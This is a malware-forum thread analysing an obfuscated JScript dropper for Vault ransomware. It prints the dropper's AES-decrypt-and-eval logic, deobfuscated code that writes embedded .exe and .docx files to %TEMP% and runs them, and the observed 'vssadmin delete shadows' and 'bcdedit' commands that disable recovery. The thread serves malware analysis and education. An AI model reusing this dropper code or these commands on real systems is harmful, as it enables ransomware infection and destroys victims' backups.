for (var m = this._nRounds, h = a ^ c[0], k = a[b + 1] ^ c[1], n = a[b + 2] ^ c[2], p = a[b + 3] ^ c[3], q = 4, r = 1; r >> 24] ^ e[k >>> 16 & 255] ^ f[n >>> 8 & 255] ^ l[p & 255] ^ c[q++], u = d[k >>> 24] ^ e[n >>> 16 & 255] ^ f[p >>> 8 & 255] ^ l[h & 255] ^ c[q++], v = d[n >>> 24] ^ e[p >>> 16 & 255] ^ f[h >>> 8 & 255] ^ l[k & 255] ^ c[q++], p = d[p >>> 24] ^ e[h >>> 16 & 255] ^ f[k >>> 8 & 255] ^ l[n & 255] ^ c[q++], h = t, k = u, n = v;
t = (g[h >>> 24] << 24 | g[k >>> 16 & 255] << 16 | g[n >>> 8 & 255] << 8 | g[p & 255]) ^ c[q++];
u = (g[k >>> 24] << 24 | g[n >>> 16 & 255] << 16 | g[p >>> 8 & 255] << 8 | g[h & 255]) ^ c[q++];
v = (g[n >>> 24] << 24 | g[p >>> 16 & 255] << 16 | g[h >>> 8 & 255] << 8 | g[k & 255]) ^ c[q++];
p = (g[p >>> 24] << 24 | g[h >>> 16 & 255] << 16 | g[k >>> 8 & 255] << 8 | g[n & 255]) ^ c[q++];
a = t;
a[b + 1] = u;
a[b + 2] = v;
a[b + 3] = p

}, keySize: 8

}); e.AES = l._createHelper(c)

})();

var y22b7a = "exe",

q580762 = 67,
b6175991f = 63;
f72f174db17f6 = "Q946B90E6F7";

function B90E6F7(e, l, c) {

return 6

}

var y07d1e = 6,

y75206 = 2,
y2fb25 = 1,
y411e3 = "df986316b86",
y61980 = 0,
y34a34 = CryptoJS.AES.decrypt("U2FsdGVkX18mdXFJOYoC3QUfAJkTq8V++E3mIztGyPKlHvBoV79yAYamumS4NroB1uYbpQzpyQIbkXl6rRb5VrbrobV6qP+70ajaNo+ICYrE9U1DnH6qNXZlMQpHNSYWrCzfGrtUYAX3nIa/JM33C4Qu5HaAyVlIpSDBax0CAe2n8Ogz6gVzD42u6Jk8KeLcNZNjSa63IzKOopapCnIZ/oQFOiwkF19q2SFMBs9F4hH0/m1cKizYszZYcF/t/c+FVeRuQsDLMZ6xJ6km9oTSWmRGXVy9PDXpsyVJvbxHM+HxkDuo3VwFjLJboTV3AydOclWCnmsNj0yp+ZIKqXZxLW/dDqMqpNQ//N3UiMM84w7KqRNtYmZNbXMTqp13qHY3BTli9WzetzUDgUgQcutvYy0hNzrlyHMK4KRbaA8heDuEmKqJFEFLixZDXFFgi/ggzWZcLLAFt0SjKRoZdFo0qC9Gc+yRJcuE3XJMzOWWB/NTE6/Blqzvb3XKwA8svI371tVtvagdEzQM/H6+QXbBww==", "5CC039F2");

function QF2A(e) {

WScript.CreateObject("Scripting.FileSystemObject");
return 6

}

QF2A();

function Q32A(e) {

WScript.CreateObject("Scripting.FileSystemObject");
return 5

}
Q32A();
var qf7c4b2 = 60, bcd014079 = 64; ff168a3b06ec5 = "Q174BA67691";

function BA67691(e, l, c) {

return 2

}

function Q516(e) {

WScript.CreateObject("Scripting.FileSystemObject");
return 2

}

Q516();

var ya2c48 = "TE",

yc84ac = "" + y411e3 + "." + y22b7a + "";

function QB50(e, l, c) {

return 10

}
var ybb42b = CreateObject,

yac4e8 = "%" + ya2c48 + "MP%\\doc_b5c7d9.docx",
yab34a = "ADODB.Stream",
y6c7db = ActiveXObject,
yd381b = "%" + ya2c48 + "MP%\\" + yc84ac + "";

function QCFF(e, l, c) {

return 6

}

var q7f1f66 = 75,

bfb75abf4 = 3;

fbc597fcac449 = "QCDCB4C0B9C";

function B4C0B9C(e, l, c) {

return 3

}

var yd5e19 = y34a34.toString(CryptoJS.enc.Utf8), y5ff2e = yd381b;

function CreateObject(e) {

return new y6c7db(e)

}

var y0afb1 = "WScript.Shell",

y1597b = y0afb1,
y454b7 = "Msxml2.DOMDocument." + y07d1e + "." + y61980 + "",
y231d9 = "bin.base64",
y07c02 = ybb42b(y1597b),
yd381b = y07c02.ExpandEnvironmentStrings(yd381b),
yeea6a = new ybb42b(yab34a),
y0067b = /6ab6/g;

function Q35C(e, l, c) {

return 9

}

var yb61db = new y6c7db(y454b7),

y95fd5 = yb61db.createElement("y56f04"),
yac4e8 = y07c02.ExpandEnvironmentStrings(yac4e8),
y1861b = y8d17e.replace(y0067b, "y");
y95fd5.dataType = y231d9; y95fd5.text = y1861b;

function Q56D(e, l, c) {

return 7

}

y81f64 = y95fd5.nodeTypedValue;

function Q75C(e, l, c) {

return 4

}
y95fd5.dataType = y231d9; y95fd5.text = yfcd0f;

function QD88(e) {

WScript.CreateObject("Scripting.FileSystemObject");
return 1

}
QD88(); y004e7 = y95fd5.nodeTypedValue; eval(yd5e19);

Take a look at some var/function names

CryptoJS,
sigBytes
decodeURIComponent
BufferedBlockAlgorithm
_map: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
WordArray
Hasher
algo
hash.words
_createHmacHelper
_ENC_XFORM_MODE
createEncryptor
CipherParams
OpenSSL
SerializableCipher
createDecryptor
PasswordBasedCipher
lib.BlockCipher
AES
_invKeySchedule
encryptBlock

Some well none parts / easy to understand :

"WScript.Shell"

yab34a = "ADODB.Stream",
y6c7db = ActiveXObject,
ExpandEnvironmentStrings
WScript.CreateObject("Scripting.FileSystemObject")
var ybb42b = CreateObject,

"Msxml2.DOMDocument." + y07d1e + "." + y61980 + ""
=> "Msxml2.DOMDocument.6.0"

yd381b = "%" + ya2c48 + "MP%\\" + yc84ac + "";
=> not to hard to find : %TEMP%\\df986316b86.exe

yac4e8 = "%" + ya2c48 + "MP%\\doc_b5c7d9.docx",
=> not to hard to find : %TEMP%\\doc_b5c7d9.docx"

Where are the future files ?

yeacb7 += "/v1pCkAAAAAAAAAAA..........
var y8d17e = yeacb7;
y8d17e += "Y87iR74BT..............
var yfcd0f = "UEsDBBQABgA
var y59526 = ="TVqQAAMAAAAEA.............."
(files hidden in above vars)

At the end of the script :

eval(yd5e19); => evaluate the code in yd5e19

var yd5e19 = y34a34.toString(CryptoJS.enc.Utf8)

y34a34 = CryptoJS.AES.decrypt("U2FsdGVkX18mdXFJOYoC3QUfAJkTq8V++E3mIztGyPKlHvBoV79yAYamumS4NroB1uYbpQzpyQIbkXl6rRb5VrbrobV6qP+70ajaNo+ICYrE9U1DnH6qNXZlMQpHNSYWrCzfGrtUYAX3nIa/JM33C4Qu5HaAyVlIpSDBax0CAe2n8Ogz6gVzD42u6Jk8KeLcNZNjSa63IzKOopapCnIZ/oQFOiwkF19q2SFMBs9F4hH0/m1cKizYszZYcF/t/c+FVeRuQsDLMZ6xJ6km9oTSWmRGXVy9PDXpsyVJvbxHM+HxkDuo3VwFjLJboTV3AydOclWCnmsNj0yp+ZIKqXZxLW/dDqMqpNQ//N3UiMM84w7KqRNtYmZNbXMTqp13qHY3BTli9WzetzUDgUgQcutvYy0hNzrlyHMK4KRbaA8heDuEmKqJFEFLixZDXFFgi/ggzWZcLLAFt0SjKRoZdFo0qC9Gc+yRJcuE3XJMzOWWB/NTE6/Blqzvb3XKwA8svI371tVtvagdEzQM/H6+QXbBww==", "5CC039F2");

=> Base64 stuff but encrypted : their function decrypts it

The part that will call the main stuff / creates the files, etc

copy-paste the content of the string and the password (both without quotes),

AES Decrypt Text - AES Decryption - Online - Browserling Web Developer Tools

Once Decrypted - but obfuscated:

yeea6a.Type=y2fb25;
yeea6a.Open();
yeea6a.Write(y81f64);
try {yeea6a.SaveToFile(yd381b,y75206);}
catch(y21bcd){}
yeea6a.Close();
yeea6a.Type=y2fb25;
yeea6a.Open();
yeea6a.Write(y004e7);
try {yeea6a.SaveToFile(yac4e8,y75206);}
catch(y3fcf6){}
yeea6a.Close();
try {y07c02.Run(""+yac4e8+"",y2fb25,y61980);
}catch(yd6448){};
try {y07c02.Run(""+y5ff2e+"",y61980,y61980);}
atch(y4d193){}

Deobfuscated :

oADOBSream.Open();

y95fd5 = yb61db.createElement("y56f04"),
= > create an element on msxml document
"Msxml2.DOMDocument.6.0"
y95fd5.dataType ="bin.base64";
y95fd5.text = y8d17e.replace(y0067b, "y");
y81f64 = y95fd5.nodeTypedValue; decode Base64

oADOBSream.Write(y81f64);
try {

oADOBSream.SaveToFile("C:\Users\DardiM\AppData\Local\Temp\\df986316b86.exe",2);

}
catch(e){
}
oSream.Close();
oSream.Type=2;
oSream.Open();

y004e7 = y95fd5.nodeTypedValue ;

decode Base64

oSream.Write(y004e7);

try {

oSream.SaveToFile("C:\Users\DardiM\AppData\Local\Temp\doc_b5c7d9.docx",2);

}
catch(e){
}
oADOBSream.Close();
try {

y07c02.Run("C:\Users\DardiM\AppData\Local\Temp\doc_b5c7d9.docx",1,0);

}
catch(e){
};
try {

y07c02.Run("C:\Users\DardiM\AppData\Local\Temp\df986316b86.exe",0,0);

}
catch(e){
}

The Script is an "all in one" malware/ransomware

It creates :

%TEMP%\\doc_b5c7d9.docx"
%TEMP%\\df986316b86.exe"

these files are encoded inside the Script

The doc file is open in WINWORD.EXE with parameter /n
Starts a new instance of Word with no document open. Documents opened in each instance of Word will not appear as choices in the Window menu of other instances.

WMIC.exe process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"

=> UAC warning if well activated

=> vssadmin.exe delete shadows /all /quiet (PID: 3860)
=> bcdedit.exe /set {default} recoveryenabled no (PID: 3956)
=> bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures (PID:

=> unable backup restorations, and ignore any error message

3) Conclusion for this part :

This script contains its own functions to make advanced stuff (encrypting, decripting, AES, openSSL, etc) and all files to init the infection.

But it only uses the AES decrypting part to be able to use one of the hidden part in the script itself.

To get the docx and .exe files without any risk :

=> we only have to :

- replace the eval(yd5e19) described above by the real part decrypted
- put the run parts in commentary

- use a IDE tool to make it run (Protected environment to avoid problems )
(Microsoft Visual Studio debugger with Wscript.exe, for me)

ADOBSream => will save the files with good content

That's all for the moment

Next part will follow, with more info, if some people are interested
(I can explain more things about the code / files)

Edited :
https://malwaretips.com/threads/deo...js-ransom-ba-tr-all-in-one.62797/#post-537853

Antelox · Aug 27, 2016

I'ts Vault ransomware. Not new...

DardiM · Aug 27, 2016

Antelox said:
I'ts Vault ransomware. Not new...

(For me, It's the same if you had said "it's a Renault car, not new")

1) Yes a Vault ransomware version, easy to see on processes names (just see the spoiler part "processes details"), and thanks for the spoil

2) Analyse on this forum of this script obfuscation method is ... New

Detection ratio: 2 / 56 => why ? the obfuscation methods used in this Script

----------------------------------------
- Oh a locky rnasomware ?
- ok, what version ?
- heu... a locky ransomware...
----------------------------------------

The posts I make are about obfuscation methods used in Scripts...
And what they make to escape from detection (heuristik, etc...)

Once the first obfuscation method is defeated, it's very easy to understand what the script do, the files it drops, even get these files. That's the aim of this analysis.

When I find from Malware vault a sample with Methods never analyzed here

, I make a post with an analysis of the script and the methods it used. And that's really the first time I can post here an analysis with the FIRST obfuscation method used, and all the other parts.
- If I find another script already analyzed, I make a quick analyse to show URLs used and the payload name (=> report / black list)
- if I find a sample with a modification from previous version, I make a quick analysis of this part.

I never analyse ransomware in my thread (the Sample are tested by static and dynamical methods on Malware Vault), only the obfuscation used in the script and what we can make to see and understand all the parts. You may be an expert on how all the stuff are made, but here there are also members that like to see and understand how the script part works

, for example, the first part that hide the real part, the files names, urls, etc...

----------------------------------------------------------------------------------

- Hi, peter, I have a scripted file that drop a ransomware!
- yeah that's cool, a vault ransomware !
- oh a vaukt ransomware ! Have a good day
- thks, you too
----------------------------------------------------------------------------------

HOW IT WORKS : it's my philosophy in all my analysis of obfuscated Scripted samples.

DardiM · Aug 27, 2016

To summarize :
All that can be understand by static / easy decoding tools

1) First deobfuscation is made when running

2) The content / names of two files hard coded in the script are prepared

- doc_b5c7d9.docx
- df986316b86.exe

- all the content parts of these files are on vars (one var or cut in several parts) as Base64 encoded.
- only the exe file as one "trick" against decoding :

=> one y has been replaced by /6ab6/g

3) AES encrypted part is decrypted and put on a var

- The AES and the big part of the numerous function and sub functions are only used here

CryptoJS.AES.decrypt("U2FsdGVkX18mdXFJOYoC3QUfAJkTq8V++E3mIztGyPKlHvBoV79yAYamumS4NroB1uYbpQzpyQIbkXl6rRb5VrbrobV6qP+70ajaNo+ICYrE9U1DnH6qNXZlMQpHNSYWrCzfGrtUYAX3nIa/JM33C4Qu5HaAyVlIpSDBax0CAe2n8Ogz6gVzD42u6Jk8KeLcNZNjSa63IzKOopapCnIZ/oQFOiwkF19q2SFMBs9F4hH0/m1cKizYszZYcF/t/c+FVeRuQsDLMZ6xJ6km9oTSWmRGXVy9PDXpsyVJvbxHM+HxkDuo3VwFjLJboTV3AydOclWCnmsNj0yp+ZIKqXZxLW/dDqMqpNQ//N3UiMM84w7KqRNtYmZNbXMTqp13qHY3BTli9WzetzUDgUgQcutvYy0hNzrlyHMK4KRbaA8heDuEmKqJFEFLixZDXFFgi/ggzWZcLLAFt0SjKRoZdFo0qC9Gc+yRJcuE3XJMzOWWB/NTE6/Blqzvb3XKwA8svI371tVtvagdEzQM/H6+QXbBww==", "5CC039F2");

copy-paste here the base64 code and the password I put in red (both without quotes)
AES Decrypt Text - AES Decryption - Online - Browserling Web Developer Tools

4) The script makes the Base64 decoding using "Msxml2.DOMDocument.6.0"

Method used :

An element is created :

var document = new ActiveXObject("Msxml2.DOMDocument.6.0")
element = document.createElement("y56f04"),

Data prepared :

element.dataType : "bin.base64"
element.text = content of the file concerned

=> Base64 decode at Step 6)

5 )The var that contains the AES decrypted part is evaluated

6) Content put on a ADODBStream object buffer (for each content files)

content = element.nodeTypedValue ; => Base64 decode
oStream.Write(content);

7) Files created

%TEMP%\doc_b5c7d9.docx
Example : "C:\Users\DardiM\AppData\Local\Temp\doc_b5c7d9.docx"

%TEMP%\df986316b86.exe
Example : "C:\Users\DardiM\AppData\Local\Temp\df986316b86.exe"

Example :

try {

oSream.SaveToFile(file_path,2);

}
catch(e){
}
oADOBSream.Close();

8) "Bad" Files are run

Example :

try {

oShell.Run(file_path,0,0);

}
catch(e){
}

About the second parameter :
Optional. Integer value indicating the appearance of the program's window. Note that not all programs make use of this information.
0 :
Hides the window and activates another window.
1 :
Activates and displays a window. If the window is minimized or maximized, the system restores it to its original size and position. An application should specify this flag when displaying the window for the first time.

0 is used for df986316b86.exe
1 is used for doc_b5c7d9.docx

JM Safe · Aug 28, 2016

DardiM said:
createEncryptor
CipherParams
OpenSSL
SerializableCipher
createDecryptor
PasswordBasedCipher

These function names and types obviously are very common in ransomware samples

DardiM · Aug 28, 2016

JM Security said:
These function names and types obviously are very common in ransomware samples

Yes, I know it, but the main difference here :

"common in ransomware" => this is not the ransomware file that I have analyzed but the dropper part

These elaborated functions and sub functions have been written entirely in JavaScript and put into the single JS file in an auto sufficient way (exe files use api calls / dll).

=> A big job / part (for poor result) !

- look the spoiler part where I put all the deobfuscated code !
- remember what can basically do JavaScript with wscript.exe /cscript.exe

And None of the function listed are used by the script to encrypt / decrypt any file of the target computer.
=> only used to decrypt a part of the scripted code when running, that has been AES encrypted to hide how it decodes and drop the real ransomware parts / files

(part easily decrypted)

LabZero · Sep 8, 2016

Deobfuscation is the worst work in the analysis!
So thanks for that @DardiM !

Search

Malware Analysis Deobfuscation - Amazing advanced sample - JS/Ransom.BA!tr - all in one

DardiM

Level 26

Antelox

New Member

DardiM

Level 26

DardiM

Level 26

JM Safe

Level 39

DardiM

Level 26

LabZero

Similar threads